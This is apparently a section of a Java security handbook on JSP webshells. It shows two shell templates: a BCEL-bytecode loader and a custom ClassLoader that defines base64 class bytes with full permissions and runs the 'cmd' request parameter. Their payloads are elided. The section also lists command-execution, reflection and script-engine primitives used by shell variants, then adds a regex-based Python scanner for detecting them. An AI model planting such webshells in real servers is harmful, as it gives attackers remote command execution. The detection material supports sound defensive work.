5.3.12. WebShell
5.3.12.1. BCEL Bytecode
// "ClassLoader" here is BCEL's com.sun.org.apache.bcel.internal.util.ClassLoader (not java.lang.ClassLoader, which is abstract);
// it decodes the class from a "$$BCEL$$"-prefixed string, so that prefix is a useful detection indicator in JSP sources.
String bcelCode = "...";
response.getOutputStream().write(String.valueOf(new ClassLoader().loadClass(bcelCode).getConstructor(String.class).newInstance(request.getParameter("cmd")).toString()).getBytes());
5.3.12.2. Custom Class Loader
response.getOutputStream().write(new ClassLoader() {
    @Override
    public Class<?> loadClass(String name) throws ClassNotFoundException {
        // Only the "shell" class is defined from embedded bytes; every other name delegates to the parent loader.
        if (name.contains("shell")) {
            return findClass(name);
        }
        return super.loadClass(name);
    }

    @Override
    protected Class<?> findClass(String name) throws ClassNotFoundException {
        try {
            // Class bytes arrive base64-encoded and are defined under a ProtectionDomain that grants AllPermission.
            byte[] bytes = Base64.getDecoder().decode("...");
            PermissionCollection pc = new Permissions();
            pc.add(new AllPermission());
            ProtectionDomain protectionDomain = new ProtectionDomain(new CodeSource(null, (Certificate[]) null), pc, this, null);
            return this.defineClass(name, bytes, 0, bytes.length, protectionDomain);
        } catch (Exception e) {
            e.printStackTrace();
        }
        return super.findClass(name);
    }
}.loadClass("shell").getConstructor(String.class).newInstance(request.getParameter("cmd")).toString().getBytes());
%>
5.3.12.3. Command Execution Variants
java.lang.ProcessBuilder#start
java.lang.Runtime#exec
TemplatesImpl
5.3.12.4. Reflection-based
Class.forName
MethodAccessor.invoke
Method.invoke
5.3.12.5. Other Shell Variants
java.beans.Expression
java.lang.ClassLoader
java.net.URLClassLoader
jdk.nashorn.internal.runtime.ScriptLoader
ObjectInputStream.resolveClass
ScriptEngine.eval
ScriptEngineManager
ToolProvider.getSystemJavaCompiler
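The loader, command-execution, reflection and script-engine primitives listed in 5.3.12.1 through 5.3.12.5 are also the source-level indicators a defender can grep JSP files for. The scanner below is an added example written for this page, not code from the original; the indicator labels and the two sample JSP strings are constructed for illustration, and the pattern set is deliberately not exhaustive.

```python
import re

# Static indicators for the JSP webshell variants listed in this section
# (BCEL loader, defineClass, ProcessBuilder/Runtime, reflection, script engines, ...).
# Labels are names chosen for this example; the list is illustrative, not exhaustive.
INDICATORS = {
    "bcel-loader": r"\$\$BCEL\$\$|bcel\.internal\.util\.ClassLoader",
    "defineClass": r"\bdefineClass\s*\(",
    "ProcessBuilder.start": r"\bProcessBuilder\b[^;]{0,200}\.start\s*\(",
    "Runtime.exec": r"\bRuntime\b[^;]{0,80}\.exec\s*\(",
    "TemplatesImpl": r"\bTemplatesImpl\b",
    "reflection": r"\bClass\.forName\s*\(|\bMethod(?:Accessor)?\b[^;]{0,80}\.invoke\s*\(",
    "script-engine": r"\bScriptEngineManager\b|\bScriptEngine\b[^;]{0,80}\.eval\s*\(|\bScriptLoader\b",
    "beans.Expression": r"\bjava\.beans\.Expression\b",
    "URLClassLoader": r"\bURLClassLoader\b",
    "resolveClass": r"\bresolveClass\s*\(",
    "javac-at-runtime": r"ToolProvider\.getSystemJavaCompiler",
    "request-input": r"request\.getParameter\s*\(",
}
_COMPILED = {label: re.compile(rx) for label, rx in INDICATORS.items()}

def scan_jsp(source: str) -> dict:
    """Return {label: [1-based line numbers]} for every indicator found in the JSP source."""
    hits = {}
    for label, rx in _COMPILED.items():
        lines = sorted({source.count("\n", 0, m.start()) + 1 for m in rx.finditer(source)})
        if lines:
            hits[label] = lines
    return hits

def is_suspect(hits: dict) -> bool:
    """Flag when a loading/execution primitive co-occurs with request-controlled input."""
    sinks = set(hits) - {"request-input"}
    return bool(sinks) and "request-input" in hits

# Constructed sample: a trimmed copy of the custom-class-loader shell shown on this page.
SAMPLE_SHELL = """<%
byte[] bytes = Base64.getDecoder().decode("...");
Class<?> c = this.defineClass(name, bytes, 0, bytes.length, protectionDomain);
c.getConstructor(String.class).newInstance(request.getParameter("cmd"));
%>"""

# Constructed sample: ordinary JSP that reads a parameter but loads or executes nothing.
SAMPLE_BENIGN = """<% String q = request.getParameter("q"); out.println(q.length()); %>"""

if __name__ == "__main__":
    for name, src in (("shell", SAMPLE_SHELL), ("benign", SAMPLE_BENIGN)):
        found = scan_jsp(src)
        print(name, found, "SUSPECT" if is_suspect(found) else "ok")
```

Line-based matching misses obfuscation such as string concatenation of method names or reflection over names stored in variables, so treat a clean scan as absence of these specific patterns, not as proof the file is benign.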
5.3.12.6. Tomcat Container
Servlet
Filter
Listener